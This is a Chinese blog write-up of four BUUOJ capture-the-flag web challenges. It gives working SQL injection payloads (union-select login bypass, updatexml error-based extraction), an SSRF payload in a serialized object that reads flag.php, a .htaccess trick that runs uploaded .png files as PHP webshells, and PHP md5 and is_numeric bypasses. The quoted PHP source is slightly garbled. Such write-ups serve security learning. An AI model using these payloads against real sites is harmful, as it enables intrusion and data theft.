2021-06-27 CTF Webbuuoj day16

最新推荐文章于 2022-09-04 14:57:19 发布
最新推荐文章于 2022-09-04 14:57:19 发布
阅读量210 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LiNa_lInA_741/article/details/118275421
版权

CTF Web buu oj day16

[GXYCTF2019]BabySQli

类型

SQL注入

解题

  1. 正常请求,有一段只含大写字母和数字的,base32解码,然后base64再解。
    sql语句
    base32
    sql注入语句
  2. name注入admin’ or 1=1#有过滤or,(,),之前的做法这题都不行了。在这里插入图片描述
  3. 看WP,有源码
<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>Do you know who am I?</title>
<?php
require "config.php";
require "flag.php";

// 去除转义
if (get_magic_quotes_gpc()) {
	function stripslashes_deep($value)
	{
		$value = is_array($value) 
		array_map('stripslashes_deep', $value) 
		stripslashes($value);
		return $value;
	}

	$_POST = array_map('stripslashes_deep', $_POST);
	$_GET = array_map('stripslashes_deep', $_GET);
	$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
	$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}

mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);


if(preg_match("/\(|\)|\=|or/", $name)){
	die("do not hack me!");
}
else{
	if (!$result) {
		printf("Error: %s\n", mysqli_error($con));
		exit();
	}
	else{
		// echo '<pre>';
		$arr = mysqli_fetch_row($result);
		// print_r($arr);
		if($arr[1] == "admin"){
			if(md5($password) == $arr[2]){
				echo $flag;
			}
			else{
				die("wrong pass!");
			}
		}
		else{
			die("wrong user!");
		}
	}
}

?>

源码
判断name是否是admin,如果不是提示wrong user!,如果password的md5值跟数据库查询结果一致,则返回flag,否则返回wrong pass!
解题关键是如何绕过这个判断逻辑。
看WP,union select如果查询不存在的话会插入一个数据。
unions select通过Order by 判断有4个字段。
Oder by 3#
Order by 4#
union select ‘admin’,2,3#,wrong user!
1' union select 'admin',2,3#
union select 1,‘admin’,3#,wrong pass!,user的位置对了。
在这里插入图片描述
构造payload为 name=1’ union select 1,‘admin’,‘eccbc87e4b5ce2fe28308fd9f2a7baf3’#&pw=3
应该是,这样union select 1,‘admin’,'eccbc87e4b5ce2fe28308fd9f2a7baf3’会插入union select数据,'eccbc87e4b5ce2fe28308fd9f2a7baf3’是3的md5值,插入后就有一条1,admin,3的数据,这样pw=3就可以满足md5($password) == $arr[2]了。
flag

[网鼎杯 2018]Fakebook

类型

SQL注入、SSRF

解题

  1. 注册一个用户admin/123/123/http://www.baidu.com
    no=1
    sql注入:
    sql注入查no=1
    SSRF点,data参数,text/html,base64编码。
    SSRF
  2. 注入点测试
    sql注入点
    no hack
    绕过过滤,database()
    database
    注入都是报错
    注入报错
    报错注入
    表名1%20and%20updatexml(1,concat(%27~%27,(select/**/group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27fakebook%27),%27~%27),1)%23
    tables
    列名1%20and%20updatexml(1,concat(%27~%27,(select/**/group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27fakebook%27%20and%20table_name=%27users%27),%27~%27),1)%23
    columns
    数据

1%20and%20updatexml(1,concat(%27~%27,substr((select/**/group_concat(no,username,passwd,data)%20from%20fakebook.users),140,32),'~'),1)%23

UserInfo左
1%20and%20updatexml(1,concat(%27~%27,substr((select/**/group_concat(no,username,passwd,data)%20from%20fakebook.users),170,32),'~'),1)%23
UserInfo右
得到data的格式:
data
user.php.bak把UserInfo序列化,blog设置成SSRF的payloadfile:///var/www/html/flag.php
序列化
-1/**/union/**/select/**/1,2,3,%27O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}%27
payload注入
返回base64解码
flag

[MRCTF2020]你传你🐎呢

类型

weshell上传

解题

  1. 无论上传什么都会被拦截。

  2. 看WP是上传png会成功,可是我的png怎么传不上去,把一句话木马2.php改成2.png上传成功,返回路径。
    2.png

  3. 接下来怎么以php读2.png了,这里用到的方法是上传了.htaccess
    .htaccess(分布式配置文件),类似于之前做到的题目中.user.ini,允许用户自己修改此目录及其所有子目录的配置。
    AddType application/x-httpd-php .png,配置.png当作php代码执行。
    上传.htaccess,抓包修改Content-Type=image/jpeg
    .htaccess上传
    这里有个插曲,.htaccess不像.user.ini创建是新建txt文档重命名即可,重命名提示缺少文件名,这时要编辑好,另存为.htaccess,文件类型选择所有文件
    .htaccess
    两个文件都上传成功后,蚁剑连接到返回的目录upload/8e35816f606927c3c2efe232906f4e3b/2.png
    蚁剑
    翻根目录找到flag
    flag
    这里.htaccess还有一种是修改文件被当作php执行

<FilesMatch "2.png">
SetHandler application/x-httpd-php
</FilesMatch>

.htaccess

[MRCTF2020]Ez_bypass

类型

php代码审计

解题

绕过所有if判断就可以
源代码

  1. 第一个if:GET请求上传两个参数gg和id,都有值

  2. 第二个if:(md5($gg)===md5($id))&&$id !== $gg绕过返回’You got the first step’
    利用array的md5值===绕过这个if:
    get成功

  3. 第三个if: post传参passwd,绕过返回’You can not get it !’
    传入passwd

  4. 第四个if:passwd不等于数字,绕过返回"can you think twice??"
    passwd传入字符串
    绕过isnumeric

  5. 第五个if:$passwd==1234567,绕过返回flag
    通过$passwd=1234567+字符绕过
    flag

LiNa_lInA_741
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
[GXYCTF2019]BabySQli
xj28555的博客
09-02 258
进入题目一个登录框 对登录框做了一些常规的sql注入和fuzz发现都无果。然后在等级登录后跳转的search.php页面查看源代码发现一段编码。 MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5 发现其是一段base32编码,解码后发现又是一段base64编码。 c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZ
BUUCTF 个人做题记录【6-6】
qq_61620566的博客
06-06 349
一个ctf的成长记录
你知道我是谁吗?Do You Know Who I Am?
趋势创造者-一直在努力,拥抱大海,拥抱浩瀚的天空,探知未来的世界 祗偽妳動訫 Happiness keeps you Sweet
11-08 691
Text A                                 Do You Know Who I Am?    Mr Smith is well known in Washington because of his many social blunders. He always likes to attend the various social functions becaus...
CTF-网络信息安全攻防学习平台(基础关)
丶没胡子的猫
06-30 1万+
基础关第一关第二关第三关第四关第五关第六关第七关第八关第九关第十关第十一关第十二关 题库地址:http://hackinglab.cn 第一关 题目:         key值在哪里? 解题方法: 查看源代码即可看到key值 ctrl+u F12 view-source:http://xxxxx 鼠标右键->点击查看页面源代码 第二关 题目:       
*CTF 2022web(CVE-2021-43798)
……
09-04 1414
CVE-2021-43798漏洞复现 *CTF 2022web
2021-02-03-ctf-如来十三掌
Be Smart
03-21 3257
layout: post title: “ctf入门————如来十三掌” categories: [ctf] tags: [ctf] 题目描述:菜狗为了打败菜猫,学了一套如来十三掌 题目给的是一个Word文档,内容如下: 夜哆悉諳多苦奢陀奢諦冥神哆盧穆皤三侄三即諸諳即冥迦冥隸數顛耶迦奢若吉怯陀諳怖奢智侄諸若奢數菩奢集遠俱老竟寫明奢若梵等盧皤豆蒙密離怯婆皤礙他哆提哆多缽以南哆心曰姪罰蒙呐神。舍切真怯勝呐得俱沙罰娑是怯遠得呐數罰輸哆遠薩得槃漫夢盧皤亦醯呐娑皤瑟輸諳尼摩罰薩冥大倒參夢侄阿心罰等奢大度地冥殿皤沙.
2021-02-18-ctf-坚持60s-反编译
Be Smart
03-22 4479
layout: post title: “ctf-坚持60s” categories: [ctf] tags: [反编译] 反编译: 反编译做的就是编译的相反动作。举例说,例如一个程序用C语言写,写完之后要编译成CPU可以识别和运行的机器代码,也就是生成EXE程序。而反编译是反过来,把EXE反编译成编程源代码,也就是C程序,不过一般反编译大多数都是从机器码反编译为汇编。其他语言的情况基本也是这样的。至于具体要怎么用,这个就看你的目的了。但一般情况下是通过反编译主要是用于没有源码的程序的分析,例如破解别人.
2021-02-18-ctf-gif转二进制
Be Smart
03-22 3551
layout: post title: “ctf-gif转二进制” categories: [ctf] tags: [ctf] [目标] 简单密码学 [环境] windows [工具] 转换二进制为字符串工具 [分析过程] 打开文件出现多个黑白,让人联想到二进制,白色图片代表0,黑色图片代表1。 01100110前八位二进制换算后为 f 证明思路正确。 011001100110110001100001011001110111101101000110011101010100111001011111011.
JIS-CTF-VulnUpload-CTF01靶机渗透测试
weixin_52971422的博客
04-11 3427
靶机名:JIS-CTF-VulnUpload-CTF01 攻击机:kali 任务寻找5个flag 靶机信息扫描 Nmap -sV -A -p- ip 信息收集 发现有Robots协议 上网页 成功拿到第一个flag 上到/admin_area发现了第二个flag和网页用户 上到/login.php登录 登录上去后发现有个文件上传 直接上传一个shell.php上去看看 好像成功上传上去了,在前面robots.txt里有uploaded_files的
CTF实战训练日志——2021-6-27(五)
热门推荐
stybill的博客
06-27 4万+
题目: telnet 解题:
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-misc工具2-CTF-Tools-masterV1.3.7
最新发布
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-Write-up:CTF撰写和信息
03-21
CTF-Write-up:CTF撰写和信息
2021-oweek-ctf
05-11
2021年O-CTF 2021 O-Week CTF挑战库,包括解决方案和源代码,您可以自己运行它。 解决方案也将很快添加到写库中。 希望您在参加CTF的过程中感到愉快! 请继续关注未来CTF的更新!
hacker101-ctf:Hacker101 CTF编写
02-06
Hacker101 CTF0x00概述是HackerOne免费在线培训计划的一部分。 确实是为初学者应用所有笔测试技能的好地方。0x01 CTF 难度(点) 名称技能专长完成时间琐碎的(1 /标志)网页1/1 容易(2 /标志) 网页4/4 中(3 /...
zer0pts-CTF-2021:zer0pts CTF 2021
05-06
zer0pts-CTF-2021zer0pts CTF 2021和彩云分流:链接: 提取码:gZce
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF-Game-Challenges:精选各种CTF的游戏挑战赛清单
05-09
CTF游戏挑战我最近一直在学习有关游戏黑客的知识,而我可以合法找到的最好的练习方法是玩 。 但是困难的部分是从以前的CTF中找出游戏中的挑战。 此列表包括我在玩ctfs和阅读文章时遇到的游戏挑战。 由于一些游戏...
Apple-Mail CTF
07-27
回答: Apple-Mail CTF是一个CTF(Capture The Flag)比赛中的一个题目或挑战。根据提供的引用内容,我们无法确定具体的Apple-Mail CTF是什么样的题目或挑战。引用\[1\]提到了EML文件的常见文件扩展名,而引用\[2\]提到了MIME类型校验和文件上传的相关内容,引用\[3\]则是一个关于文件上传的POST请求的示例。根据这些信息,我们可以猜测Apple-Mail CTF可能涉及到文件上传和MIME类型校验的相关知识点。但具体的题目内容和解题方法需要进一步了解。 #### 引用[.reference_title] - *1* [CTF隐写术知识点总结](https://blog.csdn.net/qq_64584459/article/details/124649589)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [[CTFHub] Web 文件上传 Write ups](https://blog.csdn.net/weixin_45646006/article/details/113890188)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值